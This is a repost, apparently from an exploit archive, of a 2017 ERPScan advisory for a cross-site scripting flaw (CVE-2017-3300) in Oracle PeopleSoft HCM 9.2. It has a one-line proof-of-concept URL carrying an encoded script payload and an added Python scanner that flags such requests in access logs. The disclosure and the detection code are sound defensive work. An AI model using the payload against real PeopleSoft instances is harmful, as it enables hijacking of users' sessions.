zdt | Vahagn Vardanyan | 1337DAY-ID-26785
Jan 23, 2017 - 12:00 a.m.

Oracle PeopleSoft HCM 9.2 Cross Site Scripting Vulnerability

2017-01-23 00:00:00
Vahagn Vardanyan
0day.today

EPSS: 0.001 (percentile: 51.9%)

Exploit for Windows platform in category local exploits

Application: Oracle PeopleSoft

Vendor: Oracle

Bugs: XSS

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Authors: Vahagn Vardanyan, Dmitry Yudin



1. ADVISORY INFORMATION

Title: Oracle PeopleSoft XSS vulnerability

Advisory ID: [ERPSCAN-17-005]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle



2. VULNERABILITY INFORMATION

Class: XSS [CWE-79]

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2017-3300

CVSS Base Score: 6.1



3. VULNERABILITY DESCRIPTION

An attacker can use a specially crafted HTTP request to hijack the session
data of administrators or users.



4. VULNERABLE PACKAGES


$ psreleaseinfo

ToolsRelease: 8.55.03

ToolsReleaseDB: 8.55



PeopleSoft HCM 9.2



PORTAL.war/WEB-INF/lib/mcfIM.jar



$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar

36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar



5. SOLUTIONS AND WORKAROUNDS

Oracle CPU January 2017


6. AUTHOR


Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13)/ERPScan



7. TECHNICAL DESCRIPTION



7.1. Proof of Concept



xss


http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E
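
A detection check for the request pattern in the proof of concept above, as an added example that is not part of the original advisory: it scans web access log lines for IMServlet requests whose decoded query parameters contain markup. The access log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup that has no place in an IM user or server name: tags,
# namespace declarations, inline event handlers.
MARKUP_RE = re.compile(r'[<>]|xmlns\s*[:=]|\bon\w+\s*=', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return names of IMServlet query parameters whose decoded value holds markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/imservlet"):
        return []
    hits = []
    # parse_qsl decodes once; fully_decode handles further encoding layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if MARKUP_RE.search(fully_decode(value)):
            hits.append(name)
    return hits


# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jan/2017:10:00:01 +0000] "GET /IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=jsmith HTTP/1.1" 200 312',
    '10.0.0.9 - - [17/Jan/2017:10:00:07 +0000] "GET /IMServlet?Method=MSN_PRESENCE&im_to_user=%3Ca%20xmlns:a=%27x%27%3E%3Ca:body%20onload=%27x%27/%3E%3C/a%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Jan/2017:10:00:09 +0000] "GET /IMServlet?im_to_user=%253Cb%253E HTTP/1.1" 200 98',
    '10.0.0.7 - - [17/Jan/2017:10:00:11 +0000] "GET /psp/ps/?q=%3Cb%3E HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line), line[:60])
```

Hits on hosts that have not yet received the January 2017 CPU are the ones to triage first.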



8. REPORT TIMELINE

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017



9. REFERENCES

http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

#  0day.today [2018-01-01]  #
